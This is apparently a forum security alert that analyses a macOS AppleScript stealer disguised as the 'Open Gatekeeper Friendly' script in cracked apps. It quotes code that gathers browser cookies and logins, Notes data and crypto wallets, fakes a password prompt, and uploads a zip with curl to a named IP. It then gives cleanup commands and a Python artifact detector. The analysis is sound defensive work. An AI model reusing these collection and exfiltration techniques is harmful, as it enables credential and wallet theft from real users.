Security Alert MacOS Malware.

Because this exists too.
In the cracked applications produced by the TNT team, an "Open Gatekeeper Friendly" application/script is a common feature; it bypasses Gatekeeper so that the cracked application can be installed. It has worked this way for a long time.

Russian guys are now trying to exploit this. The script's name is the same as in the original TNT releases. Their script does nothing special: it just collects all the private data it can find and uploads it to a remote server. See below.
Considering that a significant share of users are, to put it mildly, not technical geniuses, many will fall for this scam.

Security Alert: "Open Gatekeeper Friendly" Malware Detected

Analysis of Malicious AppleScript Payload

This script is a malicious payload designed to collect sensitive user data, bundle it into a compressed file, and exfiltrate it to a remote server. Below is a detailed breakdown of its functionality and behavior:

Script Behavior

1. Initialization
Temporary Directory Setup:

set randomNumber to do shell script "echo $((RANDOM % 9000 + 1000))"
set writemind to "/tmp/" & randomNumber & "/"
mkdir(writemind)

- Creates a random directory in /tmp to stage collected data.

System Information Collection:

set result to (do shell script "system_profiler SPSoftwareDataType SPHardwareDataType SPDisplaysDataType")
writeText(result, writemind & "info")

- Gathers macOS version, hardware details, and display information.

2. User Data Collection
Browsers:

set chromiumMap to {{"Chrome", library & "Google/Chrome/"}, ...}
chromium(writemind, chromiumMap)

- Targets Chrome, Brave, Edge, Opera, and similar browsers to collect:
  - Cookies
  - Login data
  - Browser profiles

Notes and Safari:

readwrite2(profile & "/Library/Group Containers/group.com.apple.notes/NoteStore.sqlite", ...)

- Copies SQLite databases storing Notes and Safari cookies.

Cryptocurrency Wallets:

set walletMap to {{"deskwallets/Electrum", profile & "/.electrum/wallets/"}, ...}
deskwallets(writemind, walletMap)

- Looks for wallets like Electrum, Monero, and others to exfiltrate private keys.

Generic Files:

filegrabber(writemind)

- Searches Desktop, Documents, and Downloads for files with extensions like .txt, .pdf, .docx, .wallet, etc.

3. Data Compression
- Bundles collected data into a zip file:

do shell script "ditto -c -k --sequesterRsrc " & writemind & " /tmp/out.zip"

4. Data Exfiltration
- Sends the zip file to a remote server:

send_data(0)

- The send_data function uses curl to POST the zip file to http://81.19.135.54/joinsystem.

5. Cleanup
- Deletes the temporary directory and zip file:

do shell script "rm -r " & writemind
do shell script "rm /tmp/out.zip"

Key Functionalities

Password Handling
- The script attempts to collect the user's password via a deceptive dialog box:

display dialog "Required Application Helper.\nPlease enter password for continue."

- If the user provides a password, it validates it using dscl . authonly.

Repeated Attempts
- If the password prompt fails, the script loops indefinitely, attempting to trick the user into entering it.

Retry Logic for Data Upload
- The send_data function retries up to 40 times if the upload fails:

if attempt < 40 then
delay 3
send_data(attempt + 1)
end if

What Happens if Interrupted?
1. Before Compression:
- Data will remain in /tmp/<randomNumber> but won't be sent.
- Look for remnants in /tmp.

2. During Compression:
- /tmp/out.zip may exist but will be incomplete.

3. During Upload:
- If curl is interrupted, the server may receive a partial or no file.

4. After Upload:
- If the upload succeeds, the script will clean up traces by deleting /tmp/<randomNumber> and /tmp/out.zip.

Recommendations

Inspect Temporary Files
- Check /tmp for remnants:

ls -la /tmp/

Search for curl Logs
- Look for evidence of upload activity:

grep -i "81.19.135.54" /var/log/system.log

Kill Suspicious Processes
- Ensure no part of the script is running:

ps aux | grep osascript
ps aux | grep curl

Secure Your System
- Change passwords for any potentially compromised accounts.
- Use antivirus software to scan for lingering threats.
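A small defender-side check for the artifacts the analysis above describes (the /tmp/<randomNumber> staging directory with its "info" file, /tmp/out.zip, and osascript/curl processes). This is an added example, not the script from the post; the directory layout and the ps lines are constructed samples.

```python
import os
import re
import shutil
import tempfile

# The staging dir is /tmp/<N>/ with N = RANDOM % 9000 + 1000 (1000..9999), and the
# first file the script writes there is "info" (system_profiler output).
STAGING_DIR_RE = re.compile(r"^[1-9]\d{3}$")
EXFIL_HOST = "81.19.135.54"  # upload target quoted in the analysis above


def find_staging_dirs(tmp_root):
    """Staging directories left behind when the script was stopped before cleanup."""
    hits = []
    for name in sorted(os.listdir(tmp_root)):
        path = os.path.join(tmp_root, name)
        if os.path.isdir(path) and STAGING_DIR_RE.match(name) \
                and os.path.isfile(os.path.join(path, "info")):
            hits.append(name)
    return hits


def find_exfil_archive(tmp_root):
    """The bundled archive exists only between compression and cleanup."""
    return ["out.zip"] if os.path.isfile(os.path.join(tmp_root, "out.zip")) else []


def suspicious_processes(ps_lines):
    """Flag osascript, and curl only when it talks to the known upload host."""
    return [line.strip() for line in ps_lines
            if "osascript" in line or ("curl" in line and EXFIL_HOST in line)]


def demo():
    root = tempfile.mkdtemp()  # constructed stand-in for /tmp
    os.makedirs(os.path.join(root, "4821"))
    with open(os.path.join(root, "4821", "info"), "w") as f:
        f.write("Software:\n    System Software Overview:\n")
    os.makedirs(os.path.join(root, "12"))  # wrong shape: ignored
    open(os.path.join(root, "out.zip"), "wb").close()
    ps = [  # constructed `ps aux` output, not captured from a real host
        "user 512 0.1 0.2 osascript /Volumes/App/Open Gatekeeper Friendly",
        "user 513 0.0 0.1 curl -X POST -F file=@/tmp/out.zip http://81.19.135.54/joinsystem",
        "user 600 0.0 0.1 curl https://updates.example.invalid/check",
    ]
    try:
        return find_staging_dirs(root), find_exfil_archive(root), suspicious_processes(ps)
    finally:
        shutil.rmtree(root)
```

Run it against a live machine by calling find_staging_dirs("/tmp") and find_exfil_archive("/tmp") and feeding real `ps aux` output to suspicious_processes.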

Comments

Would you be so kind as to move the part after the first or second paragraph out of the intro box and into the body box. Thank you very much.

Does the script also knock before the payload POST? Because that host doesn't really listen on 80/tcp.